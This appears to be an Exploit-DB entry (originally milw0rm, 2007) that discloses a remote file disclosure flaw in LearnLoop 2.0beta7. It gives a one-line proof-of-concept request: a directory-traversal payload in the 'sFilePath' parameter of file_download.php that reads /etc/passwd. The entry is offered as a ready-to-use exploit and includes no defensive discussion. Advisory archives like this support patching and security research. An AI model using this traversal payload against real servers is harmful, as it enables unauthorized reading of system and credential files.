LearnLoop 2.0beta7 - 'sFilePath' Remote File Disclosure

EDB-ID:

4680

Author:

GoLd_M

Type:

webapps

Platform:

PHP

Published:

2007-11-29

LearnLoop 2.0beta7 (sFilePath) Remote File Disclosure Vulnerability
http://surfnet.dl.sourceforge.net/sourceforge/learnloop/learnloop2.0beta7.tar.gz
POC : /include/file_download.php?sFilePath=../../../../../../../etc/passwd

# milw0rm.com [2007-11-29]